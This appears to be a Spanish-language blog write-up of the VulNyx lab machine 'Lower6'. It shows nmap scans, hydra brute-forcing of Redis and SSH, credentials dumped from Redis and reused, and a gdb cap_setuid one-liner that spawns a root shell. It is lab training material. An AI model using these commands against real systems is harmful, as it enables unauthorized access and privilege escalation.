cd ~/blog

~/writeups/vulnyx/33-lower6.md

33 - Lower6

low Linux vulnyx 08-11-2025
Redis weak password (brute force)Credential reuse + SSH brute forceLinux Capabilities Privesc (gdb cap_setuid)
vulnyx.com

~1 min de lectura


Identificamos la IP de la máquina víctima:

 arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.227

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.227
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 17:16 -0300
Nmap scan report for 10.207.245.227
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
6379/tcp open  redis
MAC Address: 08:00:27:9F:85:90 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
 nmap -sCV -p 22,6379 -oN 02-targeted.txt 10.207.245.227
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 17:17 -0300
Nmap scan report for 10.207.245.227
Host is up (0.00023s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
6379/tcp open  redis   Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds

El puerto 6379 corre Redis, pero requiere autenticación:

 redis-cli -h 10.207.245.227 COMMAND INFO GET
(error) NOAUTH Authentication required.

Hacemos fuerza bruta de la contraseña con hydra:

 hydra -P ~/Documents/wordlists/rockyou.txt 10.207.245.227 redis -t 64
...
[6379][redis] host: 10.207.245.227   password: hellow
...

Ya autenticados, listamos los comandos disponibles filtrando los relacionados con claves:

 redis-cli -h 10.207.245.227 -a hellow COMMAND LIST | grep key
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
command|getkeysandflags
command|getkeys
hkeys
cluster|keyslot
cluster|countkeysinslot
cluster|getkeysinslot
keys
randomkey

 redis-cli -h 10.207.245.227 -a hellow COMMAND LIST | grep get
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
command|getkeysandflags
command|getkeys
getbit
slowlog|get
hgetall
config|get
getrange
get
acl|getuser
cluster|forget
cluster|getkeysinslot
getdel
hmget
mget
getset
client|getredir
client|getname
hget
getex

Listamos las keys y volcamos su contenido, que resulta ser un conjunto de credenciales:

 redis-cli -h 10.207.245.227 -a hellow KEYS '*'
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
1) "key5"
2) "key1"
3) "key3"
4) "key4"
5) "key2"

 redis-cli -h 10.207.245.227 -a hellow MGET key1 key2 key3 key4 key5
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
1) "killer:K!ll3R123"
2) "ghost:Ghost!Hunter42"
3) "snake:Pixel_Sn4ke77"
4) "wolf:CyberWolf#21"
5) "shadow:ShadowMaze@9"

Formateamos las credenciales en listas de usuarios y contraseñas, y hacemos fuerza bruta contra SSH (probando todas las combinaciones por si hay reutilización cruzada):

 cat credentials.txt
"killer:K!ll3R123"
"ghost:Ghost!Hunter42"
"snake:Pixel_Sn4ke77"
"wolf:CyberWolf#21"
"shadow:ShadowMaze@9"

 cat credentials.txt | awk -F ':' '{print $1}' | tr -d '"' > users.txt

 cat credentials.txt | awk -F ':' '{print $2}' | tr -d '"' > passwords.txt

 hydra -L users.txt -P passwords.txt 10.207.245.227 ssh -t 64
...
[22][ssh] host: 10.207.245.227   login: killer   password: ShadowMaze@9
...

Nos logueamos con killer:ShadowMaze@9 (credenciales cruzadas) y obtenemos la primera flag:

 ssh killer@10.207.245.227
killer@10.207.245.227's password: ShadowMaze@9
killer@lower6:~$

Para escalar privilegios, buscamos binarios con capabilities (Linux Capabilities Privesc):

killer@lower6:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep

gdb tiene la capability cap_setuid, que nos permite invocar setuid(0) y lanzar una shell de root:

killer@lower6:~$ gdb -nx -ex 'python import os; os.setuid(0)' -ex '!bash' -ex quit

root@lower6:~#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados